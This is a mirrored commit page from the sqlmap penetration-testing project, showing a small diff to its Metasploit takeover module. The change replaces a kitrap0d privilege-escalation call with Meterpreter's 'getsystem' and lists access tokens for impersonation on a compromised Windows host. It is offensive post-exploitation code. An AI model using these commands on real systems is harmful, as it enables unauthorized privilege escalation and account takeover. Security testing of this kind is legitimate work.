sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-24 00:04:23 +03:00
Code Issues Packages Projects Releases Wiki Activity

--priv-esc now relieas on more powerful and complete getsystem Meterpreter command that also implements kitrap0d as 4th technique

Browse Source
This commit is contained in:
Bernardo Damele 2010-01-29 14:57:33 +00:00
parent c20b196518
commit 767c67e37a
1 changed files with 7 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
lib/takeover/metasploit.py
View File

@ -448,23 +448,25 @@ class Metasploit:
proc.stdin.write("use priv\n")
proc.stdin.write("use sniffer\n")
proc.stdin.write("sysinfo\n")
proc.stdin.write("getuid\n")
if conf.privEsc:
print
infoMsg = "trying to escalate privileges using "
infoMsg += "kitrap0d script"
infoMsg = "trying to escalate privileges using Meterpreter"
infoMsg += "'getsystem' command which tries different "
infoMsg += "techniques, including kitrap0d"
logger.info(infoMsg)
proc.stdin.write("run kitrap0d\n")
proc.stdin.write("getsystem\n")
infoMsg = "displaying the list of Access Tokens availables. "
infoMsg += "Choose which user you want to impersonate by "
infoMsg += "using incognito's command 'impersonate_token'"
infoMsg += "using incognito's command 'impersonate_token' if "
infoMsg += "'getsystem' did not success to elevate privileges"
logger.info(infoMsg)
proc.stdin.write("list_tokens -u\n")
proc.stdin.write("getuid\n")